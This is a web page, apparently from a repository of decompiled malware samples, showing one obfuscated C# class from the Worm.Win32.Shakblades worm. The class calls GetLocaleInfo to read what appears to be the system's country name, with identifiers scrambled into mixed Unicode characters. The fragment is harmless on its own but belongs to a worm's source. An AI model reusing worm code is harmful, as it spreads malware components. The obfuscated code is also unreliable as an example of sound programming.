MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/௏.cs
2022-08-18 06:28:56 -05:00

34 lines
1.2 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.௏
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System.Runtime.InteropServices;
using System.Text;
namespace Ҧ߲ʽ
{
internal class \u0BCF
{
private const uint \u139Eਗ = 1024;
private const uint ߦĢ = 4098;
[DllImport("kernel32.dll", EntryPoint = "GetLocaleInfo")]
private static extern int \u0F07صȷ\u18ACᤖ(
uint _param0,
uint _param1,
[Out] StringBuilder ҒʼnƔ,
int _param3);
private static string е(uint )
{
StringBuilder ҒʼnƔ = new StringBuilder(256);
int num = \u0BCF.\u0F07صȷ\u18ACᤖ(1024U, , ҒʼnƔ, ҒʼnƔ.Capacity);
return num > 0 ? ҒʼnƔ.ToString().Substring(0, num - 1) : string.Empty;
}
public static string \u1819ᮋ() => \u0BCF.е(4098U);
}
}